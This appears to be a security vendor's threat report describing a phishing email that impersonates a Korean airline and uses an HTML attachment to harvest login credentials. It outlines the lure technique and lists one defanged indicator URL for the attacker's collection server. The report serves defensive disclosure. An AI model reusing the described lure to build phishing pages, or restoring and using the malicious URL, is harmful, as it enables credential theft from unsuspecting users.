The ASEC analysis team has recently discovered a phishing email that impersonates a well-known Korean airline to collect user credentials. The phishing email contains a notice on airline ticket payment, inducing the reader to connect to the disguised phishing page with specific ticket prices and details that implies that the sender has background information of the reader.
The subject and the body of the email are shown below.

Figure 1. Subject and body of the email
When the attached HTML file is opened, a connection is made to a phishing page disguised as one of Korea’s well-known airlines.

Figure 2. Phishing page
The page disguises its source as the airline’s management support team and requires the victim to enter their account credentials and print the plane ticket in PDF.

Figure 3. A part of the phishing site’s HTML code
When the user enters the password and clicks ‘View statement,’ the account credentials collected from the page are sent to the attacker’s server.

Figure 4. Sending account credentials
To prevent damage from such phishing emails that are distributed under an elaborate disguise, users need to take extra caution when they view files attached to emails from unknown sources.
AhnLab currently blocks the domain related to this phishing page.
[IOC Info]
- hxxps://ocostelaosantos[.]com.br/wp-content/plugins/vitor-teste/actions/crude/cross.php
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Categories:Malware Information